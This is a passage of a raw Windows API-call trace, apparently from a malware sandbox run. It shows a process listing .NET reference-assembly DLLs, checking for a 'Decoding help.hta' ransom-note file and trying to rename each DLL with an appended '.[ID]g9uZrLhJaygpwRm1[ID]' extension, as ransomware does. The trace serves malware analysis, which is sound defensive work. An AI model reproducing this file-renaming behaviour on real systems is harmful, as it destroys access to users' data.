lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.592] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.592] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Data.Services.Design.dll") returned -1 [0057.592] lstrlenW (lpString="System.Data.Services.Design.dll") returned 31 [0057.592] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.592] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.592] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.592] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Data.Services.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll" [0057.592] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll" [0057.592] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.design.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.design.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.592] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb462f54b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb462f54b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb462f54b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa9000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Services.dll", cAlternateFileName="")) returned 1 [0057.593] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.593] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.593] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.593] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Data.Services.dll") returned -1 [0057.593] lstrlenW (lpString="System.Data.Services.dll") returned 24 [0057.593] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.593] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.593] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Data.Services.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll" [0057.593] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll" [0057.593] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.593] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6651e86, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb6651e86, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb6677fe6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x47000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.DirectoryServices.AccountManagement.dll", cAlternateFileName="")) returned 1 [0057.593] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.593] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.593] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.593] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.DirectoryServices.AccountManagement.dll") returned -1 [0057.593] lstrlenW (lpString="System.DirectoryServices.AccountManagement.dll") returned 46 [0057.593] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.594] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.594] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.594] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.DirectoryServices.AccountManagement.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll" [0057.594] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll" [0057.594] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.594] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.directoryservices.accountmanagement.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.directoryservices.accountmanagement.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.594] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb669e146, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb669e146, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb669e146, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Management.Instrumentation.dll", cAlternateFileName="")) returned 1 [0057.594] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.594] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.594] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.594] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.594] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Management.Instrumentation.dll") returned -1 [0057.594] lstrlenW (lpString="System.Management.Instrumentation.dll") returned 37 [0057.594] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.594] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.594] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.594] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Management.Instrumentation.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll" [0057.594] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll" [0057.594] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.594] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.management.instrumentation.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.management.instrumentation.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.594] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb656d644, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb656d644, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb656d644, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Net.dll", cAlternateFileName="")) returned 1 [0057.595] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.595] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.595] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.595] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.595] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Net.dll") returned -1 [0057.595] lstrlenW (lpString="System.Net.dll") returned 14 [0057.595] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.595] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.595] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Net.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll" [0057.595] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll" [0057.595] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.595] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.net.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.net.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.595] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb44fea48, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb44fea48, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb44fea48, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x8b000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.ServiceModel.Web.dll", cAlternateFileName="")) returned 1 [0057.595] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.595] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.595] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.595] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.595] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.ServiceModel.Web.dll") returned -1 [0057.596] lstrlenW (lpString="System.ServiceModel.Web.dll") returned 27 [0057.596] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.596] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.596] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.596] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.ServiceModel.Web.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll" [0057.596] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll" [0057.596] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.596] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.servicemodel.web.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.servicemodel.web.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.596] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb662bd26, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb662bd26, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb662bd26, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x13000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Web.Abstractions.dll", cAlternateFileName="")) returned 1 [0057.596] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.596] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.596] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.596] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.596] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Web.Abstractions.dll") returned -1 [0057.596] lstrlenW (lpString="System.Web.Abstractions.dll") returned 27 [0057.596] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.596] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference 